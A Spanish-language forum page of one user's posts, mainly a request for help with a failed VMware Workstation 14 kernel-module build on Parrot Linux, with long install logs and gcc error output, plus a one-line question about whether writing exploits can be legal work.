Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Mostrar Mensajes

Esta sección te permite ver todos los posts escritos por este usuario. Ten en cuenta que sólo puedes ver los posts escritos en zonas a las que tienes acceso en este momento.


Temas - dolphin

Páginas: [1] 2 3
1
Hola, me preguntaba si se puede trabajar legalmente haciendo exploits, se puede?  ???

2
Dudas y pedidos generales / Error vmware
« en: Diciembre 16, 2017, 12:44:10 pm »
Hola,tengo un problema en mi pc, uso parrot y cuando intento compilar vmware me da un error, es la vesion 14.0.0

el error es este:



Código: [Seleccionar]
#uname -ar
Linux parrot 4.14.0-parrot2-amd64 #1 SMP Parrot 4.14.2-1parrot2 (2017-12-05) x86_64 GNU/Linux

Código: [Seleccionar]
vmware-12108.log

2017-12-16T09:38:21.835-06:00| vthread-1| I125: Log for VMware Workstation pid=12108 version=14.0.0 build=build-6661328 option=Release
2017-12-16T09:38:21.835-06:00| vthread-1| I125: The process is 64-bit.
2017-12-16T09:38:21.835-06:00| vthread-1| I125: Host codepage=UTF-8 encoding=UTF-8
2017-12-16T09:38:21.835-06:00| vthread-1| I125: Host is Linux 4.14.0-parrot2-amd64 Parrot 3.10 - Intruder
2017-12-16T09:38:21.835-06:00| vthread-1| I125: DictionaryLoad: Cannot open file "/usr/lib/vmware/settings": No such file or directory.
2017-12-16T09:38:21.835-06:00| vthread-1| I125: [msg.dictionary.load.openFailed] Cannot open file "/usr/lib/vmware/settings": No such file or directory.
2017-12-16T09:38:21.835-06:00| vthread-1| I125: PREF Optional preferences file not found at /usr/lib/vmware/settings. Using default values.
2017-12-16T09:38:21.835-06:00| vthread-1| I125: DictionaryLoad: Cannot open file "/home/dolphin/.vmware/config": No such file or directory.
2017-12-16T09:38:21.835-06:00| vthread-1| I125: [msg.dictionary.load.openFailed] Cannot open file "/home/dolphin/.vmware/config": No such file or directory.
2017-12-16T09:38:21.835-06:00| vthread-1| I125: PREF Optional preferences file not found at /home/dolphin/.vmware/config. Using default values.
2017-12-16T09:38:21.835-06:00| vthread-1| I125: DictionaryLoad: Cannot open file "/home/dolphin/.vmware/preferences": No such file or directory.
2017-12-16T09:38:21.835-06:00| vthread-1| I125: [msg.dictionary.load.openFailed] Cannot open file "/home/dolphin/.vmware/preferences": No such file or directory.
2017-12-16T09:38:21.835-06:00| vthread-1| I125: PREF Optional preferences file not found at /home/dolphin/.vmware/preferences. Using default values.
2017-12-16T09:38:22.021-06:00| vthread-1| W115: Logging to /tmp/vmware-root/vmware-12108.log
2017-12-16T09:38:22.142-06:00| vthread-1| I125: Obtaining info using the running kernel.
2017-12-16T09:38:22.143-06:00| vthread-1| I125: Created new pathsHash.
2017-12-16T09:38:22.143-06:00| vthread-1| I125: Setting header path for 4.14.0-parrot2-amd64 to "/lib/modules/4.14.0-parrot2-amd64/build/include".
2017-12-16T09:38:22.143-06:00| vthread-1| I125: Validating path "/lib/modules/4.14.0-parrot2-amd64/build/include" for kernel release "4.14.0-parrot2-amd64".
2017-12-16T09:38:22.143-06:00| vthread-1| I125: Failed to find /lib/modules/4.14.0-parrot2-amd64/build/include/linux/version.h
2017-12-16T09:38:22.143-06:00| vthread-1| I125: /lib/modules/4.14.0-parrot2-amd64/build/include/linux/version.h not found, looking for generated/uapi/linux/version.h instead.
2017-12-16T09:38:22.143-06:00| vthread-1| I125: using /usr/bin/gcc-7 for preprocess check
2017-12-16T09:38:22.161-06:00| vthread-1| I125: Preprocessed UTS_RELEASE, got value "4.14.0-parrot2-amd64".
2017-12-16T09:38:22.161-06:00| vthread-1| I125: The header path "/lib/modules/4.14.0-parrot2-amd64/build/include" for the kernel "4.14.0-parrot2-amd64" is valid.  Whoohoo!
2017-12-16T09:38:22.532-06:00| vthread-1| I125: found symbol version file /lib/modules/4.14.0-parrot2-amd64/build/Module.symvers
2017-12-16T09:38:22.532-06:00| vthread-1| I125: Reading symbol versions from /lib/modules/4.14.0-parrot2-amd64/build/Module.symvers.
2017-12-16T09:38:22.605-06:00| vthread-1| I125: Read 19842 symbol versions
2017-12-16T09:38:22.606-06:00| vthread-1| I125: Reading in info for the vmmon module.
2017-12-16T09:38:22.606-06:00| vthread-1| I125: Reading in info for the vmnet module.
2017-12-16T09:38:22.606-06:00| vthread-1| I125: Reading in info for the vmblock module.
2017-12-16T09:38:22.606-06:00| vthread-1| I125: Reading in info for the vmci module.
2017-12-16T09:38:22.606-06:00| vthread-1| I125: Reading in info for the vsock module.
2017-12-16T09:38:22.606-06:00| vthread-1| I125: Setting vsock to depend on vmci.
2017-12-16T09:38:22.606-06:00| vthread-1| I125: Invoking modinfo on "vmmon".
2017-12-16T09:38:22.611-06:00| vthread-1| I125: "/sbin/modinfo" exited with status 256.
2017-12-16T09:38:22.611-06:00| vthread-1| I125: Invoking modinfo on "vmnet".
2017-12-16T09:38:22.615-06:00| vthread-1| I125: "/sbin/modinfo" exited with status 256.
2017-12-16T09:38:22.615-06:00| vthread-1| I125: Invoking modinfo on "vmblock".
2017-12-16T09:38:22.621-06:00| vthread-1| I125: "/sbin/modinfo" exited with status 256.
2017-12-16T09:38:22.621-06:00| vthread-1| I125: Invoking modinfo on "vmci".
2017-12-16T09:38:22.626-06:00| vthread-1| I125: "/sbin/modinfo" exited with status 256.
2017-12-16T09:38:22.626-06:00| vthread-1| I125: Invoking modinfo on "vsock".
2017-12-16T09:38:22.632-06:00| vthread-1| I125: "/sbin/modinfo" exited with status 0.
2017-12-16T09:38:22.663-06:00| vthread-1| I125: to be installed: vmmon status: 0
2017-12-16T09:38:22.663-06:00| vthread-1| I125: to be installed: vmnet status: 0
2017-12-16T09:38:22.695-06:00| vthread-1| I125: Obtaining info using the running kernel.
2017-12-16T09:38:22.695-06:00| vthread-1| I125: Setting header path for 4.14.0-parrot2-amd64 to "/lib/modules/4.14.0-parrot2-amd64/build/include".
2017-12-16T09:38:22.695-06:00| vthread-1| I125: Validating path "/lib/modules/4.14.0-parrot2-amd64/build/include" for kernel release "4.14.0-parrot2-amd64".
2017-12-16T09:38:22.695-06:00| vthread-1| I125: Failed to find /lib/modules/4.14.0-parrot2-amd64/build/include/linux/version.h
2017-12-16T09:38:22.695-06:00| vthread-1| I125: /lib/modules/4.14.0-parrot2-amd64/build/include/linux/version.h not found, looking for generated/uapi/linux/version.h instead.
2017-12-16T09:38:22.695-06:00| vthread-1| I125: using /usr/bin/gcc-7 for preprocess check
2017-12-16T09:38:22.712-06:00| vthread-1| I125: Preprocessed UTS_RELEASE, got value "4.14.0-parrot2-amd64".
2017-12-16T09:38:22.712-06:00| vthread-1| I125: The header path "/lib/modules/4.14.0-parrot2-amd64/build/include" for the kernel "4.14.0-parrot2-amd64" is valid.  Whoohoo!
2017-12-16T09:38:23.097-06:00| vthread-1| I125: found symbol version file /lib/modules/4.14.0-parrot2-amd64/build/Module.symvers
2017-12-16T09:38:23.097-06:00| vthread-1| I125: Reading symbol versions from /lib/modules/4.14.0-parrot2-amd64/build/Module.symvers.
2017-12-16T09:38:23.169-06:00| vthread-1| I125: Read 19842 symbol versions
2017-12-16T09:38:23.169-06:00| vthread-1| I125: Kernel header path retrieved from FileEntry: /lib/modules/4.14.0-parrot2-amd64/build/include
2017-12-16T09:38:23.169-06:00| vthread-1| I125: Update kernel header path to /lib/modules/4.14.0-parrot2-amd64/build/include
2017-12-16T09:38:23.169-06:00| vthread-1| I125: Validating path "/lib/modules/4.14.0-parrot2-amd64/build/include" for kernel release "4.14.0-parrot2-amd64".
2017-12-16T09:38:23.169-06:00| vthread-1| I125: Failed to find /lib/modules/4.14.0-parrot2-amd64/build/include/linux/version.h
2017-12-16T09:38:23.169-06:00| vthread-1| I125: /lib/modules/4.14.0-parrot2-amd64/build/include/linux/version.h not found, looking for generated/uapi/linux/version.h instead.
2017-12-16T09:38:23.169-06:00| vthread-1| I125: using /usr/bin/gcc-7 for preprocess check
2017-12-16T09:38:23.187-06:00| vthread-1| I125: Preprocessed UTS_RELEASE, got value "4.14.0-parrot2-amd64".
2017-12-16T09:38:23.187-06:00| vthread-1| I125: The header path "/lib/modules/4.14.0-parrot2-amd64/build/include" for the kernel "4.14.0-parrot2-amd64" is valid.  Whoohoo!
2017-12-16T09:38:23.191-06:00| vthread-1| I125: Found compiler at "/usr/bin/gcc"
2017-12-16T09:38:23.198-06:00| vthread-1| I125: Got gcc version "7".
2017-12-16T09:38:23.198-06:00| vthread-1| I125: The GCC version matches the kernel GCC minor version like a glove.
2017-12-16T09:38:23.205-06:00| vthread-1| I125: Got gcc version "7".
2017-12-16T09:38:23.205-06:00| vthread-1| I125: The GCC version matches the kernel GCC minor version like a glove.
2017-12-16T09:38:23.209-06:00| vthread-1| I125: Trying to find a suitable PBM set for kernel "4.14.0-parrot2-amd64".
2017-12-16T09:38:23.209-06:00| vthread-1| I125: No matching PBM set was found for kernel "4.14.0-parrot2-amd64".
2017-12-16T09:38:23.209-06:00| vthread-1| I125: The GCC version matches the kernel GCC minor version like a glove.
2017-12-16T09:38:23.210-06:00| vthread-1| I125: Validating path "/lib/modules/4.14.0-parrot2-amd64/build/include" for kernel release "4.14.0-parrot2-amd64".
2017-12-16T09:38:23.210-06:00| vthread-1| I125: Failed to find /lib/modules/4.14.0-parrot2-amd64/build/include/linux/version.h
2017-12-16T09:38:23.210-06:00| vthread-1| I125: /lib/modules/4.14.0-parrot2-amd64/build/include/linux/version.h not found, looking for generated/uapi/linux/version.h instead.
2017-12-16T09:38:23.210-06:00| vthread-1| I125: using /usr/bin/gcc-7 for preprocess check
2017-12-16T09:38:23.228-06:00| vthread-1| I125: Preprocessed UTS_RELEASE, got value "4.14.0-parrot2-amd64".
2017-12-16T09:38:23.228-06:00| vthread-1| I125: The header path "/lib/modules/4.14.0-parrot2-amd64/build/include" for the kernel "4.14.0-parrot2-amd64" is valid.  Whoohoo!
2017-12-16T09:38:23.237-06:00| vthread-1| I125: The GCC version matches the kernel GCC minor version like a glove.
2017-12-16T09:38:23.237-06:00| vthread-1| I125: Validating path "/lib/modules/4.14.0-parrot2-amd64/build/include" for kernel release "4.14.0-parrot2-amd64".
2017-12-16T09:38:23.237-06:00| vthread-1| I125: Failed to find /lib/modules/4.14.0-parrot2-amd64/build/include/linux/version.h
2017-12-16T09:38:23.237-06:00| vthread-1| I125: /lib/modules/4.14.0-parrot2-amd64/build/include/linux/version.h not found, looking for generated/uapi/linux/version.h instead.
2017-12-16T09:38:23.237-06:00| vthread-1| I125: using /usr/bin/gcc-7 for preprocess check
2017-12-16T09:38:23.255-06:00| vthread-1| I125: Preprocessed UTS_RELEASE, got value "4.14.0-parrot2-amd64".
2017-12-16T09:38:23.255-06:00| vthread-1| I125: The header path "/lib/modules/4.14.0-parrot2-amd64/build/include" for the kernel "4.14.0-parrot2-amd64" is valid.  Whoohoo!
2017-12-16T09:38:23.255-06:00| vthread-1| I125: Using temp dir "/tmp".
2017-12-16T09:38:23.260-06:00| vthread-1| I125: Obtaining info using the running kernel.
2017-12-16T09:38:23.260-06:00| vthread-1| I125: Setting header path for 4.14.0-parrot2-amd64 to "/lib/modules/4.14.0-parrot2-amd64/build/include".
2017-12-16T09:38:23.260-06:00| vthread-1| I125: Validating path "/lib/modules/4.14.0-parrot2-amd64/build/include" for kernel release "4.14.0-parrot2-amd64".
2017-12-16T09:38:23.260-06:00| vthread-1| I125: Failed to find /lib/modules/4.14.0-parrot2-amd64/build/include/linux/version.h
2017-12-16T09:38:23.260-06:00| vthread-1| I125: /lib/modules/4.14.0-parrot2-amd64/build/include/linux/version.h not found, looking for generated/uapi/linux/version.h instead.
2017-12-16T09:38:23.260-06:00| vthread-1| I125: using /usr/bin/gcc-7 for preprocess check
2017-12-16T09:38:23.281-06:00| vthread-1| I125: Preprocessed UTS_RELEASE, got value "4.14.0-parrot2-amd64".
2017-12-16T09:38:23.281-06:00| vthread-1| I125: The header path "/lib/modules/4.14.0-parrot2-amd64/build/include" for the kernel "4.14.0-parrot2-amd64" is valid.  Whoohoo!
2017-12-16T09:38:23.649-06:00| vthread-1| I125: found symbol version file /lib/modules/4.14.0-parrot2-amd64/build/Module.symvers
2017-12-16T09:38:23.649-06:00| vthread-1| I125: Reading symbol versions from /lib/modules/4.14.0-parrot2-amd64/build/Module.symvers.
2017-12-16T09:38:23.720-06:00| vthread-1| I125: Read 19842 symbol versions
2017-12-16T09:38:23.720-06:00| vthread-1| I125: Invoking modinfo on "vmmon".
2017-12-16T09:38:23.725-06:00| vthread-1| I125: "/sbin/modinfo" exited with status 256.
2017-12-16T09:38:23.725-06:00| vthread-1| I125: Invoking modinfo on "vmnet".
2017-12-16T09:38:23.731-06:00| vthread-1| I125: "/sbin/modinfo" exited with status 256.
2017-12-16T09:38:24.236-06:00| vthread-1| I125: Setting destination path for vmmon to "/lib/modules/4.14.0-parrot2-amd64/misc/vmmon.ko".
2017-12-16T09:38:24.236-06:00| vthread-1| I125: Extracting the vmmon source from "/usr/lib/vmware/modules/source/vmmon.tar".
2017-12-16T09:38:24.277-06:00| vthread-1| I125: Successfully extracted the vmmon source.
2017-12-16T09:38:24.278-06:00| vthread-1| I125: Building module with command "/usr/bin/make -j4 -C /tmp/modconfig-R2GeEX/vmmon-only auto-build HEADER_DIR=/lib/modules/4.14.0-parrot2-amd64/build/include CC=/usr/bin/gcc IS_GCC_3=no"
2017-12-16T09:38:30.288-06:00| vthread-1| W115: Failed to build vmmon.  Failed to execute the build command.
2017-12-16T09:38:30.293-06:00| vthread-1| I125: Setting destination path for vmnet to "/lib/modules/4.14.0-parrot2-amd64/misc/vmnet.ko".
2017-12-16T09:38:30.293-06:00| vthread-1| I125: Extracting the vmnet source from "/usr/lib/vmware/modules/source/vmnet.tar".
2017-12-16T09:38:30.307-06:00| vthread-1| I125: Successfully extracted the vmnet source.
2017-12-16T09:38:30.307-06:00| vthread-1| I125: Building module with command "/usr/bin/make -j4 -C /tmp/modconfig-R2GeEX/vmnet-only auto-build HEADER_DIR=/lib/modules/4.14.0-parrot2-amd64/build/include CC=/usr/bin/gcc IS_GCC_3=no"
2017-12-16T09:38:44.117-06:00| vthread-1| I125: Successfully built vmnet.  Module is currently at "/tmp/modconfig-R2GeEX/vmnet.o".
2017-12-16T09:38:44.117-06:00| vthread-1| I125: Found the vmnet symvers file at "/tmp/modconfig-R2GeEX/vmnet-only/Module.symvers".
2017-12-16T09:38:44.117-06:00| vthread-1| I125: Installing vmnet from /tmp/modconfig-R2GeEX/vmnet.o to /lib/modules/4.14.0-parrot2-amd64/misc/vmnet.ko.
2017-12-16T09:38:44.127-06:00| vthread-1| I125: Registering file "/lib/modules/4.14.0-parrot2-amd64/misc/vmnet.ko".
2017-12-16T09:38:45.464-06:00| vthread-1| I125: "/usr/lib/vmware-installer/2.1.0/vmware-installer" exited with status 0.
2017-12-16T09:38:45.464-06:00| vthread-1| I125: Registering file "/usr/lib/vmware/symvers/vmnet-4.14.0-parrot2-amd64".
2017-12-16T09:38:46.296-06:00| vthread-1| I125: "/usr/lib/vmware-installer/2.1.0/vmware-installer" exited with status 0.

he visto que se puede solucionar con:
Código: [Seleccionar]
vmware-modconfig --console --install-all
pero me da este error:
Código: [Seleccionar]
[AppLoader] GLib does not have GSettings support.
Stopping VMware services:
   VMware Authentication Daemon                                        done
   VM communication interface socket family                            done
   Virtual machine communication interface                             done
   Virtual machine monitor                                             done
   Blocking file system                                                done
make: Entering directory '/tmp/modconfig-0hEIO0/vmmon-only'
Using kernel build system.
/usr/bin/make -C /lib/modules/4.14.0-parrot2-amd64/build/include/.. SUBDIRS=$PWD SRCROOT=$PWD/. \
  MODULEBUILDDIR= modules
make[1]: Entering directory '/usr/src/linux-headers-4.14.0-parrot2-amd64'
  CC [M]  /tmp/modconfig-0hEIO0/vmmon-only/linux/driverLog.o
  CC [M]  /tmp/modconfig-0hEIO0/vmmon-only/linux/driver.o
  CC [M]  /tmp/modconfig-0hEIO0/vmmon-only/linux/hostif.o
  CC [M]  /tmp/modconfig-0hEIO0/vmmon-only/common/memtrack.o
  CC [M]  /tmp/modconfig-0hEIO0/vmmon-only/common/apic.o
  CC [M]  /tmp/modconfig-0hEIO0/vmmon-only/common/vmx86.o
In file included from /tmp/modconfig-0hEIO0/vmmon-only/./include/vm_asm.h:43:0,
                 from /tmp/modconfig-0hEIO0/vmmon-only/linux/hostif.c:60:
/tmp/modconfig-0hEIO0/vmmon-only/./include/x86msr.h:115:0: warning: "MSR_MISC_FEATURES_ENABLES" redefined
 #define MSR_MISC_FEATURES_ENABLES            0x140
 
In file included from /usr/src/linux-headers-4.14.0-parrot2-common/arch/x86/include/asm/msr.h:5:0,
                 from /usr/src/linux-headers-4.14.0-parrot2-common/arch/x86/include/asm/processor.h:21,
                 from /usr/src/linux-headers-4.14.0-parrot2-common/arch/x86/include/asm/cpufeature.h:5,
                 from /usr/src/linux-headers-4.14.0-parrot2-common/arch/x86/include/asm/thread_info.h:53,
                 from /usr/src/linux-headers-4.14.0-parrot2-common/include/linux/thread_info.h:38,
                 from /usr/src/linux-headers-4.14.0-parrot2-common/arch/x86/include/asm/preempt.h:7,
                 from /usr/src/linux-headers-4.14.0-parrot2-common/include/linux/preempt.h:81,
                 from /usr/src/linux-headers-4.14.0-parrot2-common/include/linux/rcupdate.h:40,
                 from /usr/src/linux-headers-4.14.0-parrot2-common/include/linux/rculist.h:11,
                 from /usr/src/linux-headers-4.14.0-parrot2-common/include/linux/pid.h:5,
                 from /usr/src/linux-headers-4.14.0-parrot2-common/include/linux/sched.h:14,
                 from /usr/src/linux-headers-4.14.0-parrot2-common/include/linux/binfmts.h:5,
                 from /tmp/modconfig-0hEIO0/vmmon-only/linux/hostif.c:32:
/usr/src/linux-headers-4.14.0-parrot2-common/arch/x86/include/asm/msr-index.h:572:0: note: this is the location of the previous definition
 #define MSR_MISC_FEATURES_ENABLES 0x00000140
 
In file included from /tmp/modconfig-0hEIO0/vmmon-only/./include/vm_asm_x86.h:41:0,
                 from /tmp/modconfig-0hEIO0/vmmon-only/./include/vm_asm_x86_64.h:40,
                 from /tmp/modconfig-0hEIO0/vmmon-only/./include/vm_asm.h:46,
                 from /tmp/modconfig-0hEIO0/vmmon-only/linux/hostif.c:60:
/tmp/modconfig-0hEIO0/vmmon-only/./include/x86_basic_defs.h:78:0: warning: "CR3_PCID_MASK" redefined
 #define CR3_PCID_MASK  0xFFF
 
In file included from /usr/src/linux-headers-4.14.0-parrot2-common/arch/x86/include/asm/irqflags.h:5:0,
                 from /usr/src/linux-headers-4.14.0-parrot2-common/include/linux/irqflags.h:16,
                 from /usr/src/linux-headers-4.14.0-parrot2-common/include/linux/rcupdate.h:39,
                 from /usr/src/linux-headers-4.14.0-parrot2-common/include/linux/rculist.h:11,
                 from /usr/src/linux-headers-4.14.0-parrot2-common/include/linux/pid.h:5,
                 from /usr/src/linux-headers-4.14.0-parrot2-common/include/linux/sched.h:14,
                 from /usr/src/linux-headers-4.14.0-parrot2-common/include/linux/binfmts.h:5,
                 from /tmp/modconfig-0hEIO0/vmmon-only/linux/hostif.c:32:
/usr/src/linux-headers-4.14.0-parrot2-common/arch/x86/include/asm/processor-flags.h:39:0: note: this is the location of the previous definition
 #define CR3_PCID_MASK 0xFFFull
 
In file included from /tmp/modconfig-0hEIO0/vmmon-only/./common/vmx86.h:32:0,
                 from /tmp/modconfig-0hEIO0/vmmon-only/linux/driver.h:32,
                 from /tmp/modconfig-0hEIO0/vmmon-only/linux/driver.c:47:
/tmp/modconfig-0hEIO0/vmmon-only/./include/x86msr.h:115:0: warning: "MSR_MISC_FEATURES_ENABLES" redefined
 #define MSR_MISC_FEATURES_ENABLES            0x140
 
In file included from /usr/src/linux-headers-4.14.0-parrot2-common/arch/x86/include/asm/msr.h:5:0,
                 from /usr/src/linux-headers-4.14.0-parrot2-common/arch/x86/include/asm/processor.h:21,
                 from /usr/src/linux-headers-4.14.0-parrot2-common/arch/x86/include/asm/cpufeature.h:5,
                 from /usr/src/linux-headers-4.14.0-parrot2-common/arch/x86/include/asm/thread_info.h:53,
                 from /usr/src/linux-headers-4.14.0-parrot2-common/include/linux/thread_info.h:38,
                 from /usr/src/linux-headers-4.14.0-parrot2-common/arch/x86/include/asm/preempt.h:7,
                 from /usr/src/linux-headers-4.14.0-parrot2-common/include/linux/preempt.h:81,
                 from /usr/src/linux-headers-4.14.0-parrot2-common/include/linux/spinlock.h:51,
                 from /usr/src/linux-headers-4.14.0-parrot2-common/include/linux/wait.h:9,
                 from /usr/src/linux-headers-4.14.0-parrot2-common/include/linux/wait_bit.h:8,
                 from /usr/src/linux-headers-4.14.0-parrot2-common/include/linux/fs.h:6,
                 from /usr/src/linux-headers-4.14.0-parrot2-common/include/linux/highmem.h:5,
                 from /tmp/modconfig-0hEIO0/vmmon-only/linux/driver.c:25:
/usr/src/linux-headers-4.14.0-parrot2-common/arch/x86/include/asm/msr-index.h:572:0: note: this is the location of the previous definition
 #define MSR_MISC_FEATURES_ENABLES 0x00000140
 
In file included from /tmp/modconfig-0hEIO0/vmmon-only/./include/vm_asm_x86.h:41:0,
                 from /tmp/modconfig-0hEIO0/vmmon-only/./include/vm_asm_x86_64.h:40,
                 from /tmp/modconfig-0hEIO0/vmmon-only/./include/vm_asm.h:46,
                 from /tmp/modconfig-0hEIO0/vmmon-only/linux/driver.c:49:
/tmp/modconfig-0hEIO0/vmmon-only/./include/x86_basic_defs.h:78:0: warning: "CR3_PCID_MASK" redefined
 #define CR3_PCID_MASK  0xFFF
 
In file included from /usr/src/linux-headers-4.14.0-parrot2-common/arch/x86/include/asm/processor.h:5:0,
                 from /usr/src/linux-headers-4.14.0-parrot2-common/arch/x86/include/asm/cpufeature.h:5,
                 from /usr/src/linux-headers-4.14.0-parrot2-common/arch/x86/include/asm/thread_info.h:53,
                 from /usr/src/linux-headers-4.14.0-parrot2-common/include/linux/thread_info.h:38,
                 from /usr/src/linux-headers-4.14.0-parrot2-common/arch/x86/include/asm/preempt.h:7,
                 from /usr/src/linux-headers-4.14.0-parrot2-common/include/linux/preempt.h:81,
                 from /usr/src/linux-headers-4.14.0-parrot2-common/include/linux/spinlock.h:51,
                 from /usr/src/linux-headers-4.14.0-parrot2-common/include/linux/wait.h:9,
                 from /usr/src/linux-headers-4.14.0-parrot2-common/include/linux/wait_bit.h:8,
                 from /usr/src/linux-headers-4.14.0-parrot2-common/include/linux/fs.h:6,
                 from /usr/src/linux-headers-4.14.0-parrot2-common/include/linux/highmem.h:5,
                 from /tmp/modconfig-0hEIO0/vmmon-only/linux/driver.c:25:
/usr/src/linux-headers-4.14.0-parrot2-common/arch/x86/include/asm/processor-flags.h:39:0: note: this is the location of the previous definition
 #define CR3_PCID_MASK 0xFFFull
 
  CC [M]  /tmp/modconfig-0hEIO0/vmmon-only/common/cpuid.o
/tmp/modconfig-0hEIO0/vmmon-only/linux/hostif.c: In function ‘HostIF_EstimateLockedPageLimit’:
/tmp/modconfig-0hEIO0/vmmon-only/linux/hostif.c:1519:31: error: implicit declaration of function ‘global_page_state’; did you mean ‘global_numa_state’? [-Werror=implicit-function-declaration]
    unsigned int lockedPages = global_page_state(NR_PAGETABLE) +
                               ^~~~~~~~~~~~~~~~~
                               global_numa_state
In file included from /tmp/modconfig-0hEIO0/vmmon-only/common/vmx86.h:32:0,
                 from /tmp/modconfig-0hEIO0/vmmon-only/common/vmx86.c:43:
/tmp/modconfig-0hEIO0/vmmon-only/./include/x86msr.h:115:0: warning: "MSR_MISC_FEATURES_ENABLES" redefined
 #define MSR_MISC_FEATURES_ENABLES            0x140
 
In file included from /usr/src/linux-headers-4.14.0-parrot2-common/arch/x86/include/asm/msr.h:5:0,
                 from /usr/src/linux-headers-4.14.0-parrot2-common/arch/x86/include/asm/processor.h:21,
                 from /usr/src/linux-headers-4.14.0-parrot2-common/arch/x86/include/asm/cpufeature.h:5,
                 from /usr/src/linux-headers-4.14.0-parrot2-common/arch/x86/include/asm/thread_info.h:53,
                 from /usr/src/linux-headers-4.14.0-parrot2-common/include/linux/thread_info.h:38,
                 from /usr/src/linux-headers-4.14.0-parrot2-common/arch/x86/include/asm/preempt.h:7,
                 from /usr/src/linux-headers-4.14.0-parrot2-common/include/linux/preempt.h:81,
                 from /usr/src/linux-headers-4.14.0-parrot2-common/include/linux/rcupdate.h:40,
                 from /usr/src/linux-headers-4.14.0-parrot2-common/include/linux/rculist.h:11,
                 from /usr/src/linux-headers-4.14.0-parrot2-common/include/linux/pid.h:5,
                 from /usr/src/linux-headers-4.14.0-parrot2-common/include/linux/sched.h:14,
                 from /tmp/modconfig-0hEIO0/vmmon-only/common/vmx86.c:31:
/usr/src/linux-headers-4.14.0-parrot2-common/arch/x86/include/asm/msr-index.h:572:0: note: this is the location of the previous definition
 #define MSR_MISC_FEATURES_ENABLES 0x00000140
 
/tmp/modconfig-0hEIO0/vmmon-only/linux/driver.c:981:1: warning: always_inline function might not be inlinable [-Wattributes]
 LinuxDriverSyncReadTSCs(uint64 *delta) // OUT: TSC max - TSC min
 ^~~~~~~~~~~~~~~~~~~~~~~
In file included from /tmp/modconfig-0hEIO0/vmmon-only/./include/vm_asm_x86.h:41:0,
                 from /tmp/modconfig-0hEIO0/vmmon-only/./include/vm_asm_x86_64.h:40,
                 from /tmp/modconfig-0hEIO0/vmmon-only/./include/vm_asm.h:46,
                 from /tmp/modconfig-0hEIO0/vmmon-only/common/vmx86.c:46:
/tmp/modconfig-0hEIO0/vmmon-only/./include/x86_basic_defs.h:78:0: warning: "CR3_PCID_MASK" redefined
 #define CR3_PCID_MASK  0xFFF
 
In file included from /usr/src/linux-headers-4.14.0-parrot2-common/arch/x86/include/asm/irqflags.h:5:0,
                 from /usr/src/linux-headers-4.14.0-parrot2-common/include/linux/irqflags.h:16,
                 from /usr/src/linux-headers-4.14.0-parrot2-common/include/linux/rcupdate.h:39,
                 from /usr/src/linux-headers-4.14.0-parrot2-common/include/linux/rculist.h:11,
                 from /usr/src/linux-headers-4.14.0-parrot2-common/include/linux/pid.h:5,
                 from /usr/src/linux-headers-4.14.0-parrot2-common/include/linux/sched.h:14,
                 from /tmp/modconfig-0hEIO0/vmmon-only/common/vmx86.c:31:
/usr/src/linux-headers-4.14.0-parrot2-common/arch/x86/include/asm/processor-flags.h:39:0: note: this is the location of the previous definition
 #define CR3_PCID_MASK 0xFFFull
 
  CC [M]  /tmp/modconfig-0hEIO0/vmmon-only/common/task.o
  CC [M]  /tmp/modconfig-0hEIO0/vmmon-only/common/hashFunc.o
In file included from /usr/src/linux-headers-4.14.0-parrot2-common/arch/x86/include/asm/processor.h:5:0,
                 from /usr/src/linux-headers-4.14.0-parrot2-common/arch/x86/include/asm/cpufeature.h:5,
                 from /usr/src/linux-headers-4.14.0-parrot2-common/arch/x86/include/asm/thread_info.h:53,
                 from /usr/src/linux-headers-4.14.0-parrot2-common/include/linux/thread_info.h:38,
                 from /usr/src/linux-headers-4.14.0-parrot2-common/arch/x86/include/asm/preempt.h:7,
                 from /usr/src/linux-headers-4.14.0-parrot2-common/include/linux/preempt.h:81,
                 from /usr/src/linux-headers-4.14.0-parrot2-common/include/linux/spinlock.h:51,
                 from /usr/src/linux-headers-4.14.0-parrot2-common/arch/x86/include/asm/mmu.h:5,
                 from /usr/src/linux-headers-4.14.0-parrot2-common/arch/x86/include/asm/desc.h:7,
                 from /tmp/modconfig-0hEIO0/vmmon-only/common/task.c:70:
/usr/src/linux-headers-4.14.0-parrot2-common/arch/x86/include/asm/processor-flags.h:39:0: warning: "CR3_PCID_MASK" redefined
 #define CR3_PCID_MASK 0xFFFull
 
In file included from /tmp/modconfig-0hEIO0/vmmon-only/./include/vm_asm_x86.h:41:0,
                 from /tmp/modconfig-0hEIO0/vmmon-only/./include/vm_asm_x86_64.h:40,
                 from /tmp/modconfig-0hEIO0/vmmon-only/./include/vm_asm.h:46,
                 from /tmp/modconfig-0hEIO0/vmmon-only/common/task.c:53:
/tmp/modconfig-0hEIO0/vmmon-only/./include/x86_basic_defs.h:78:0: note: this is the location of the previous definition
 #define CR3_PCID_MASK  0xFFF
 
  CC [M]  /tmp/modconfig-0hEIO0/vmmon-only/common/comport.o
In file included from /usr/src/linux-headers-4.14.0-parrot2-common/arch/x86/include/asm/msr.h:5:0,
                 from /usr/src/linux-headers-4.14.0-parrot2-common/arch/x86/include/asm/processor.h:21,
                 from /usr/src/linux-headers-4.14.0-parrot2-common/arch/x86/include/asm/cpufeature.h:5,
                 from /usr/src/linux-headers-4.14.0-parrot2-common/arch/x86/include/asm/thread_info.h:53,
                 from /usr/src/linux-headers-4.14.0-parrot2-common/include/linux/thread_info.h:38,
                 from /usr/src/linux-headers-4.14.0-parrot2-common/arch/x86/include/asm/preempt.h:7,
                 from /usr/src/linux-headers-4.14.0-parrot2-common/include/linux/preempt.h:81,
                 from /usr/src/linux-headers-4.14.0-parrot2-common/include/linux/spinlock.h:51,
                 from /usr/src/linux-headers-4.14.0-parrot2-common/arch/x86/include/asm/mmu.h:5,
                 from /usr/src/linux-headers-4.14.0-parrot2-common/arch/x86/include/asm/desc.h:7,
                 from /tmp/modconfig-0hEIO0/vmmon-only/common/task.c:70:
/usr/src/linux-headers-4.14.0-parrot2-common/arch/x86/include/asm/msr-index.h:572:0: warning: "MSR_MISC_FEATURES_ENABLES" redefined
 #define MSR_MISC_FEATURES_ENABLES 0x00000140
 
In file included from /tmp/modconfig-0hEIO0/vmmon-only/common/vmx86.h:32:0,
                 from /tmp/modconfig-0hEIO0/vmmon-only/common/task.c:51:
/tmp/modconfig-0hEIO0/vmmon-only/./include/x86msr.h:115:0: note: this is the location of the previous definition
 #define MSR_MISC_FEATURES_ENABLES            0x140
 
cc1: some warnings being treated as errors
